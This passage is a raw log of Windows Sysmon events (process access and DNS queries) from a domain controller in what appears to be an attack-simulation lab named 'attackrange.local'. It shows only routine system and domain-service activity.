C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1076-5F25-0000-00108C240400}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2445,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.223\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010495D0400}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.223","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010495D0400}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2446,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.223\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010495D0400}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.223","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010495D0400}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2447,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:38.727\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: WIN-DC-8400769\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:38.727","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"WIN-DC-8400769","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2448,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:38.728\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nProcessId: 2636\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:38.728","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001027C70200}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2449,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.152\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: us-east-2.compute.internal\r\nQueryStatus: 9502\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.152","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"us-east-2.compute.internal","QueryStatus":"9502","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2450,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.164\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.164","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2451,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.167\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.167","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2452,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.167\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: us-east-2.compute.internal\r\nQueryStatus: 9501\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.167","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"us-east-2.compute.internal","QueryStatus":"9501","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2453,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.167\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.167","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2454,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.167\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.167","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"attackrange.local.","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2455,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.167\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-00101EC40000}\r\nProcessId: 1204\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: ::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.167","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-00101EC40000}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2456,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.167\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nProcessId: 2636\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.167","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001027C70200}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2457,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.169\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.169","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2458,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.169\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nProcessId: 2636\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-8400769.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.169","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001027C70200}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  2 win-dc-8400769.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2459,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.169\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nQueryName: win10.ipv6.microsoft.com.\r\nQueryStatus: 0\r\nQueryResults: type:  5 onpremwindows.ipv6.microsoft.com.akadns.net;type:  5 trdovmsswestus.ipv6.microsoft.com.akadns.net;52.241.128.114;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.169","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","QueryName":"win10.ipv6.microsoft.com.","QueryStatus":"0","QueryResults":"type:  5 onpremwindows.ipv6.microsoft.com.akadns.net;type:  5 trdovmsswestus.ipv6.microsoft.com.akadns.net;52.241.128.114;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2460,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.169\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-8400769.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.169","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"attackrange.local.","QueryStatus":"0","QueryResults":"type:  2 win-dc-8400769.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2461,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.169\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nProcessId: 2636\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.169","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001027C70200}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
